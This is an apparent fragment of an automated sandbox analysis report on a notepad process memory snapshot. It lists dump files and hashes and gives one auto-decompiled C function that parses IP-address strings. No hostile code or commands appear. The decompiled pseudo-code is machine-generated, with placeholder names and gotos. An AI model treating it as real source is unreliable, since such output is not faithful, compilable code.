                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                    • API String ID: 0-3177188983
                                                    • Opcode ID: 12f5432bf507a20e32cf6d2ccb72dff9d745d6e5e89f9b07062a929745b320e2
                                                    • Instruction ID: d6663d04c42e53fe485d69d0919334b8748fd4230e6c5ac207289c2c773b264c
                                                    • Opcode Fuzzy Hash: 12f5432bf507a20e32cf6d2ccb72dff9d745d6e5e89f9b07062a929745b320e2
                                                    • Instruction Fuzzy Hash: 7B41C4B0A04204AFDB20DB68CC85FAA77E8EF44720F20C6D6F6699B3D1D774E9418760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B4FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00B4FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = L00B4EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = L00B4EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E00B4685D(_t167, 4) == 0) {
								if(E00B4685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E00B4685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E00B4685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00B28980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							L00B1DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = L00B4EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = L00B4EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                    0x00b4fcd1
                                                    0x00b4fcd6
                                                    0x00b4fcd9
                                                    0x00b4fcdc
                                                    0x00b4fcdf
                                                    0x00b4fce2
                                                    0x00b4fce5
                                                    0x00b4fce8
                                                    0x00b4fceb
                                                    0x00b4fced
                                                    0x00b4fced
                                                    0x00b4fcf3
                                                    0x00000000
                                                    0x00000000
                                                    0x00b4fcfc
                                                    0x00b4fcfe
                                                    0x00b4fdc1
                                                    0x00b7ecbd
                                                    0x00000000
                                                    0x00b7eccc
                                                    0x00b7eccc
                                                    0x00b7ecd2
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7ecdf
                                                    0x00b7ece0
                                                    0x00b7ece4
                                                    0x00b7eceb
                                                    0x00b7ecee
                                                    0x00b7eca8
                                                    0x00b7eca8
                                                    0x00b7ecaa
                                                    0x00b4fd76
                                                    0x00b4fd79
                                                    0x00b4fdb4
                                                    0x00b4fdb5
                                                    0x00b4fdb6
                                                    0x00000000
                                                    0x00b4fdb6
                                                    0x00b4fd7e
                                                    0x00b7ecfc
                                                    0x00b4fe2f
                                                    0x00000000
                                                    0x00b4fe2f
                                                    0x00b7ed08
                                                    0x00b7ed0f
                                                    0x00b7ed17
                                                    0x00b7ed1b
                                                    0x00000000
                                                    0x00b7ed1b
                                                    0x00b4fd88
                                                    0x00000000
                                                    0x00000000
                                                    0x00b4fd94
                                                    0x00b4fd99
                                                    0x00b4fda1
                                                    0x00000000
                                                    0x00000000
                                                    0x00b4fdb0
                                                    0x00000000
                                                    0x00b4fdb0
                                                    0x00b7ecbd
                                                    0x00b4fdc7
                                                    0x00b4fdcb
                                                    0x00000000
                                                    0x00b4fdd7
                                                    0x00b4fde3
                                                    0x00b4fe06
                                                    0x00b61fe7
                                                    0x00000000
                                                    0x00000000
                                                    0x00b61fef
                                                    0x00b61ff0
                                                    0x00b61ff4
                                                    0x00b61ff7
                                                    0x00b61ffa
                                                    0x00b61ffd
                                                    0x00b62000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7ecf1
                                                    0x00000000
                                                    0x00b7ecf1
                                                    0x00000000
                                                    0x00b4fe06
                                                    0x00b4fde8
                                                    0x00b4fdec
                                                    0x00b4fdef
                                                    0x00b4fdf2
                                                    0x00000000
                                                    0x00b4fdf2
                                                    0x00b4fdcb
                                                    0x00b4fd04
                                                    0x00b4fd05
                                                    0x00b7ec67
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7ec6f
                                                    0x00000000
                                                    0x00b7ec6f
                                                    0x00b4fd13
                                                    0x00b4fd3c
                                                    0x00b4fd40
                                                    0x00b7ec75
                                                    0x00b7ec7a
                                                    0x00000000
                                                    0x00b7ec8a
                                                    0x00b7ec8a
                                                    0x00b7ec90
                                                    0x00b7ecb2
                                                    0x00b4fd73
                                                    0x00b4fd73
                                                    0x00000000
                                                    0x00b4fd73
                                                    0x00b7ec95
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7eca1
                                                    0x00b7eca4
                                                    0x00b7eca5
                                                    0x00000000
                                                    0x00b7eca5
                                                    0x00b7ec7a
                                                    0x00b4fd4a
                                                    0x00000000
                                                    0x00b4fd6e
                                                    0x00b4fd6e
                                                    0x00b4fd71
                                                    0x00000000
                                                    0x00b4fd71
                                                    0x00b4fd4a
                                                    0x00b4fd21
                                                    0x00b5a3a1
                                                    0x00000000
                                                    0x00b5a3a1
                                                    0x00b4fd36
                                                    0x00b6200b
                                                    0x00b62012
                                                    0x00000000
                                                    0x00000000
                                                    0x00b62018
                                                    0x00000000
                                                    0x00b62018
                                                    0x00000000
                                                    0x00b4fd36
                                                    0x00b4fe0f
                                                    0x00b4fe16
                                                    0x00b5a3ad
                                                    0x00000000
                                                    0x00000000
                                                    0x00b5a3b3
                                                    0x00b5a3b3
                                                    0x00b4fe1f
                                                    0x00b7ed25
                                                    0x00b7ed86
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7ed91
                                                    0x00b7ed95
                                                    0x00b7ed95
                                                    0x00b7ed9a
                                                    0x00b7edad
                                                    0x00b7edb3
                                                    0x00b7edba
                                                    0x00b7edc4
                                                    0x00b7edc9
                                                    0x00000000
                                                    0x00b7edcc
                                                    0x00b7ed2a
                                                    0x00b7ed55
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7ed61
                                                    0x00b7ed66
                                                    0x00b7ed6e
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7ed7d
                                                    0x00000000
                                                    0x00b7ed7d
                                                    0x00b7ed30
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7ed3c
                                                    0x00b7ed43
                                                    0x00b7ed4b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: __fassign
                                                    • String ID:
                                                    • API String ID: 3965848254-0
                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                    • Instruction ID: a8a908d9a1f61f5f9861473c760c07d303624ebc9d954418bb3b4da16572f8f9
                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                    • Instruction Fuzzy Hash: 24916C31D0021AAEDB24CF69C8456BEB7F4EF59305F2480FAD425A7162E7309B41AB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%